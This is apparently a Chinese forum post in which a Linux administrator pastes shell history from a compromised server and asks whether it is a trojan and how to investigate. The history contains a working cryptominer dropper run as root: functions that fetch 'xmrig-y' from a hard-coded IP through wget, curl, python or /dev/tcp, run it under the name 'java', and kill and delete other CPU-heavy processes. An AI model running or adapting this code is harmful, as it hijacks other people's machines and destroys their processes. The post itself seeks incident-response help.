Linux系统中发现了一些异常的脚本，请教一下：这会是什么木马病毒吗？应该怎么去排查？
985 [2018-01-03 14:25:08][root][192.168.202.104] history
986 [2018-01-03 14:25:26][root][192.168.202.104] exit
987 ??sPid=$$
988 [2018-01-03 15:44:52][root][192.168.202.104] mPid=''
989 [2018-01-03 15:44:52][root][192.168.202.104] mName='java'
990 [2018-01-03 15:44:52][root][192.168.202.104] checkCmd() { command -v $1 >/dev/null 2>&1; }
991 [2018-01-03 15:44:52][root][192.168.202.104] downloader () { if checkCmd wget; then wget $1 -O $2 ; elif checkCmd curl; then curl $1 -o $2; elif checkCmd python; then if [ "`python -c "import sys; print(sys.version_info[0])"`" = "3" ]; then python -c "from urllib.request import urlopen; u = urlopen('"$1"'); localFile = open('"$2"', 'wb'); localFile.write(u.read()); localFile.close()"; else python -c "from urllib import urlopen; u = urlopen('"$1"'); localFile = open('"$2"', 'wb'); localFile.write(u.read()); localFile.close()"; fi; else cat < /dev/tcp/165.227.215.25/5555 > $2; fi; chmod +x $2; }
992 [2018-01-03 15:44:52][root][192.168.202.104] killer() { for tmpVar in `ps -aeo pid,%cpu,command | sed 1d | sort -k 2 | tail -n 10 | awk '{print $1}'`; do if [ $tmpVar = $sPid ]; then continue; fi; if [ $tmpVar = $mPid ]; then continue; fi; if [ `ps -o %cpu $tmpVar | sed 1d | sed 's/\..*//g'` -ge 60 ]; then if [ `ps $tmpVar | sed 1d | awk '{print $5}' | grep java` ]; then continue; fi; if [ `ps $tmpVar | sed 1d | awk '{print $5}' | grep sh` ]; then continue; fi; if [ `ps $tmpVar | sed 1d | awk '{print $5}' | grep bash` ]; then continue; fi; kill -9 $tmpVar; rm -f `ls -l /proc/$tmpVar/exe 2>&1 | sed 's/.*-> //g'`; fi; done; }
993 [2018-01-03 15:44:52][root][192.168.202.104] runer() { if [ -z "$mPid" ]; then if [ ! -f $mName ]; then downloader http://165.227.215.25/xmrig-y $mName; fi; chmod +x ./$mName; ./$mName; fi; mPid=`ps -eo pid,command | grep $mName | head -n 1 | awk '{print $1}'`; }
994 [2018-01-03 15:44:52][root][192.168.202.104] pkill python; pkill $mName
995 [2018-01-03 15:44:52][root][192.168.202.104] downloader http://165.227.215.25/xmrig-y $mName
996 [2018-01-03 14:26:01][root][192.168.202.104] history
997 [2018-01-03 14:47:22][root][192.168.202.104] crondtab -l
998 [2018-01-03 15:05:24][root][192.168.202.104] top
999 [2018-01-03 15:29:39][root][192.168.202.104] who
1000 [2018-01-03 15:34:20][root][192.168.202.104] exit